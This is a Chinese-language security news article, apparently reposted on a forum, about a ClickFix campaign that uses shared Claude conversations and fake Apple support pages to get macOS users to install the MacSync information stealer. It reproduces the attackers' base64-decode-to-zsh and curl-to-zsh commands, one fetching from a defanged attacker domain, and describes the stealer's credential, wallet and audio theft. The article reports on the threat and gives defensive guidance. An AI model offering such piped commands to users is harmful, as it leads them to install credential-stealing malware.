安全研究人员近期披露了一种新的攻击活动,攻击者通过滥用Anthropic公司的Claude平台共享功能,诱导用户执行恶意命令,从而在macOS设备上部署名为MacSync的信息窃取木马。该活动被称为“ClickFix攻击”,其恶意教程页面已获得超过15,600次浏览,影响范围正在持续扩大。
这次事件再次凸显了人工智能平台被滥用于传播恶意内容的风险,继ChatGPT、Grok之后,Claude也成为了攻击者的新阵地。
攻击链拆解:从搜索投毒到终端执行
攻击者构建了一条精心设计的诱导链,利用用户对AI内容和教程的信任完成攻击。
第一阶段:SEO投毒
攻击者购买了谷歌广告,针对macOS用户可能搜索的特定技术关键词进行恶意推广,例如:
- “在线DNS解析器”
- “macOS命令行磁盘空间分析工具”
- “HomeBrew”
第二阶段:跳转至伪造内容
当用户点击这些广告后,会被引导至两个主要类型的伪造页面:
- 公开的Claude共享对话:这些内容由攻击者生成,伪装成解决特定技术问题的“教程”。
- 伪造的苹果官方支持页面:这些页面托管在Medium等第三方博客平台上,极具迷惑性。
这些页面都包含类似的诱导性文字,提示用户:“要解决此问题,请在终端中执行以下命令...”
第三阶段:执行恶意载荷
攻击者提供的命令通常使用两种变体,旨在隐藏真实意图并直接执行。
变体一:使用base64解码并执行隐藏的脚本。
echo “...” | base64 -D | zsh
这里的“...”代表一段经过Base64编码的恶意脚本,解码后通过管道(|)直接交给zsh shell执行。
变体二:直接从远程服务器下载并执行脚本。
true && curl -SsLfk --compressed “https://raxelpak[.]com/curl/[hash]” | zsh
这条命令会从攻击者控制的服务器下载恶意脚本,并立即执行。无论哪种方式,最终都会在受害者的macOS系统上下载并安装MacSync信息窃取木马。
MacSync木马深度分析:功能全面的窃密工具
研究表明,MacSync木马具备非常强大的信息窃取能力,主要功能如下:
| 功能 |
说明 |
| 钥匙串窃取 |
提取macOS钥匙串中存储的所有网站密码、Wi-Fi密码、安全证书等。 |
| 浏览器数据窃取 |
针对Safari、Google Chrome、Brave等浏览器,窃取保存的密码、Cookie、浏览历史记录和自动填充数据。 |
| 加密货币钱包窃取 |
专门针对MetaMask等浏览器扩展钱包,窃取助记词和私钥。 |
| 屏幕录制 |
在用户不知情的情况下录制屏幕,以获取敏感信息或监控活动。 |
| 环境监听 |
通过麦克风捕获设备周围的音频对话。 |
| 命令与控制 (C2) |
连接至C2服务器a2abotnet[.]com,接收指令并回传窃取的数据。 |
该木马在实现上也采取了一些隐蔽措施:
- 使用硬编码的令牌与C2服务器通信,试图将流量伪装成正常服务。
- 部分窃取行为通过执行AppleScript脚本来完成。
- 具备数据上传失败重试机制(最多8次),上传成功后会自动清理痕迹,增加检测难度。
攻击规模与目标画像
截至目前,用作攻击诱饵的恶意Claude教程页面浏览量已超过15,600次,且数字仍在增长(几天前的观测数据为12,300次)。这表明有大量用户接触到了此威胁。
攻击者选择macOS平台和特定技术问题作为诱饵,其目标指向明确:
- 企业高管与技术人员:通常使用macOS,且账户价值较高。
- 开发者与设计师:职业习惯使其更可能搜索命令行工具和系统优化方案。
- 加密货币投资者:是信息窃取木马,尤其是能盗取钱包数据木马的理想目标。
受害者心理与攻击成功原因
此次攻击之所以能成功,关键在于利用了多重心理盲区和技术信任:
- 对AI平台的盲目信任:用户倾向于认为由Claude等主流AI生成或分享的内容是可靠、无恶意的。
- 对“教程”的盲从心理:看到标有“教程”、“解决方案”字样的内容,用户容易降低戒备,遵循步骤操作。
- 技术理解鸿沟:许多用户并不理解
base64 -D解码后接管道执行(| zsh)的风险,也不清楚curl ... | bash意味着直接从网络下载并运行未知代码。
- 搜索引擎权威性误导:通过SEO投毒,恶意链接出现在搜索结果前列,利用了用户对搜索排名的信任。
一张泄露的聊天记录截图揭示了类似的社交工程攻击如何开场:攻击者冒充异性,以“哥哥,是你约的我么 😘”等暧昧话术建立联系,其最终目的同样是诱导受害者进行下一步操作,如下载或执行恶意程序。这与ClickFix攻击利用“技术求助”场景的心理操纵本质相同。
防护与检测建议
对于个人用户(尤其是macOS用户):
- 绝不执行看不懂的命令:对任何要求复制到终端的命令,特别是包含
base64、curl ... | bash/zsh等管道的命令,保持极高警惕。
- 向AI进行安全确认:如果是从AI对话中获得命令,可以在同一会话中追问“执行这条命令有安全风险吗?”。
- 验证信息源:只从软件官方网站或官方仓库(如HomeBrew官方源)下载和安装工具。
- 启用并尊重系统安全机制:不要随意禁用macOS的Gatekeeper和系统完整性保护(SIP)。
- 定期检查钥匙串:留意钥匙串访问中是否有未知或可疑的应用程序记录。
对于企业安全团队:
- 加强终端监控:部署能够监控和告警异常命令行执行的解决方案,重点警惕
base64解码和从网络下载直接执行的行为。
- 部署端点检测与响应(EDR):确保EDR方案具备检测MacSync等已知macOS信息窃取木马的能力。
- 实施最小权限原则:日常办公不建议使用管理员(root)账户,以限制恶意软件的破坏范围。
- 开展针对性安全意识培训:教育员工警惕“教程类”社会工程攻击,并制定询问AI安全问题的规范流程。
平台责任与行业反思
此次事件将Claude及其母公司Anthropic置于焦点之下。与许多用户生成内容(UGC)平台一样,Claude的共享内容功能面临着审核挑战。平台难以在事前对所有用户分享的“教程”进行精准的安全性验证。尽管Claude已添加了“内容由用户生成,未经准确性验证”的风险提示,但显然这不足以阻止攻击。
这并非孤例。此前已有攻击者滥用ChatGPT的对话分享功能传播AMOS木马,也在Grok平台上分发过恶意软件。这标志着人工智能内容平台正面临严峻的安全性考验。攻击者正在更快地适应并利用AI时代的特性,将AI工具转化为低成本、高效率的恶意内容生产与传播渠道。
结语
ClickFix攻击揭示了一个日益清晰的现实:在AI降低内容创作门槛的同时,也同等降低了恶意内容的生产门槛。当AI生成的“教程”成为攻击载体,我们固有的信任模型需要被重新评估。
对于所有技术使用者而言,尤其是在权限极高的终端面前,保持清醒的批判性思维是第一道也是最重要的防线。在寻求AI帮助时,牢记它只是一个工具,其输出内容的质量和安全性完全取决于输入和生成者的意图。在便捷与安全之间,谨慎的权衡比以往任何时候都更为重要。
参考资料
[1] 美国发动网络攻击侵占全球虚拟资产,收割超300亿美元;|重大威胁:黑客滥用Claude发动ClickFix攻击,超万人已中招!, 微信公众号:mp.weixin.qq.com/s/kZOS-fhMzxVOuQeIOD5rqg
版权声明:本文由 云栈社区 整理发布,版权归原作者所有。
发表于 昨天 21:18
|
查看: 5|
回复: 0
